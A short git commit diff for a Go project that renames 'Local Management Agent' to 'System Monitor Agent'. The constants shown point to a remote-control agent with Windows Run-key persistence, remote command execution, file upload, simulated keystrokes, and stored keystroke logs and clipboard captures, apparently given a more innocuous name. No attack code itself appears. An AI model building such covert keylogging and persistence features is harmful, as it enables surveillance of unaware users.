Rename Local Management Agent to System Monitor Agent throughout the codebase, including updates to executable names, comments, and documentation. This change reflects a broader scope of functionality and improves clarity in the project's purpose.

This commit is contained in:
2026-08-28 13:26:50 +03:00
parent 6a070391c8
commit 09076079fb
9 changed files with 17 additions and 17 deletions
+4 -4
View File
@@ -10,20 +10,20 @@ import (
const (
Version = "1.0.0"
DefaultAddr = "0.0.0.0:5032"
MutexName = "LocalManagementAgent_Mutex"
MutexName = "SystemMonitorAgent_Mutex"
RequestBodyMax = 1 << 20
MaxUploadSize = 100 << 20 // ponytail: 100MB cap; raise via env later if needed
MaxListEntries = 10000
MaxImageQuality = 100
DefaultExecTO = 30
MaxExecTO = 120
StartupValueName = "LocalManagementAgent"
StartupValueName = "SystemMonitorAgent"
StartupRunKey = `Software\Microsoft\Windows\CurrentVersion\Run`
MaxInputText = 4096
DefaultKeyDelayMs = 25
MaxKeyDelayMs = 200
AppDataDir = "LocalManagementAgent"
InstalledExeName = "localagent.exe"
AppDataDir = "SystemMonitorAgent"
InstalledExeName = "SystemMonitorAgent.exe"
KeylogSubdir = "keystrokes"
ClipboardSubdir = "clipboard"
DefaultKeylogRetentionDays = 7